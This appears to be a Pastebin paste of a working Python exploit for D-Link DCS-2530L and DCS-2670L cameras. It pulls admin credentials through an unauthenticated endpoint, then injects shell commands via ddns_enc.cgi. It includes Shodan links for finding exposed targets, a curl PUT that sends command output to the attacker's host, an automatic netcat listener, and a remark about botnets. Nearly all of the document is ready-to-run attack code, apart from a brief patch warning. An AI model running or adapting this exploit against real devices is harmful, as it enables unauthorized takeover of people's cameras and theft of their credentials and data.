Guest User

D-Link DCS RCE 0-day

a guest
Jul 9th, 2020
1,158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.59 KB | None | 0 0
  1. '''
  2. Usage:
  3. Copy the url straight from firefox. If you want to get a netcat listener you need netcat installed
  4. and the listening port specified within open obviously.
  5.  
  6. Blind execution - python3 exploit.py http://1.2.3.4/ "curl http://pingb.in/p/xxxxxxxxxxxxxxxxxx"
  7. Netcat listener - python3 exploit.py http://1.2.3.4/ "cat /proc/cpuinfo" --listen
  8.  
  9. Info:
  10. By chaining together an unauthenticated credential disclouse 0day in multiple
  11. Dlink DCS cameras with an authenticated command injection in ddns_enc.cgi - it
  12. is possible to gain RCE.
  13.  
  14. Confirmed vulnerable:
  15. DCS-2530L, DCS-2670L
  16. https://www.shodan.io/search?query=DCS-2670L
  17. https://www.shodan.io/search?query=DCS-2530L
  18.  
  19. Limitations:
  20. The length of the 'account' parameter is limited to 55 characters. Longer commands
  21. can be executed via piping characters with "echo -ne" to a .sh or downloading a .sh
  22. from another host.
  23.  
  24. The payload will be executed every 5 seconds on the host while the payload in the account
  25. parameter is set. This exploit triies to auto terminate after 1 execution. Ajust timing if needed.
  26.  
  27. Patch:
  28. Dlink has released an advisory for the DCS-2530L but no patch. Don't port forward the
  29. camera until one has been released.
  30.  
  31. Don't be an ass. Don't brick other people's shit. I'm not responsible for anything lmfao - @dogonsecurity
  32. '''
  33.  
  34. import requests, sys, argparse, time, os
  35. from time import sleep
  36. from requests import get
  37. from urllib3.exceptions import InsecureRequestWarning
  38.  
  39. def getcreds(host):
  40.   try:
  41.     r = requests.get(host + "/config/getuser?index=0", verify=False, timeout=5)
  42.     data = r.text.split("\n")
  43.     credentials = []
  44.     credentials.append(data[0].replace("name=", "").replace("\r", ""))
  45.     credentials.append(data[1].replace("pass=", "").replace("\r", ""))
  46.     return credentials
  47.   except Exception as e:
  48.     print(e)
  49.  
  50. def execpayload(host, creds, payload):
  51.   try:
  52.     url = "/cgi-bin/ddns_enc.cgi?enable=1&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account="
  53.     endexec = "/cgi-bin/ddns_enc.cgi?enable=0&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=aaaa"
  54.     # DEBUG print(payload)
  55.     if not args.listen:
  56.       payload = "{};{};".format(url,payload)
  57.       r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
  58.       print("Sent payload... Waiting for execution.")
  59.       sleep(4)
  60.       r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
  61.       print("Blind exploit complete. Did it work :)?")
  62.     else:
  63.       ourip = get('https://api.ipify.org').text
  64.       ourport = 3 #Change if you need to
  65.       payload = "{};{} >a;curl -XPUT {}:{} -T a;".format(url,payload,ourip,ourport)
  66.       # DEBUG print(payload)
  67.       r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
  68.       print("Sent payload... Waiting for execution.")
  69.       os.system("sudo nc -lvp 3 &")
  70.       sleep(7)
  71.       r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
  72.       os.system("sudo pkill -f nc")
  73.       print("Listening exploit complete.")
  74.   except Exception as e:
  75.     print(e)
  76.  
  77. print("Hoho is the future of botnet!!11!!")
  78. parser = argparse.ArgumentParser()
  79. parser.add_argument("target", help="target",type=str)
  80. parser.add_argument("payload", help="payload",type=str)
  81. parser.add_argument("--listen", action='store_true')
  82. args = parser.parse_args()
  83.  
  84. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
  85. creds = getcreds(args.target)
  86. print("Got credentials: " + str(creds))
  87. execpayload(args.target, creds, args.payload)
Add Comment
Please, Sign In to add comment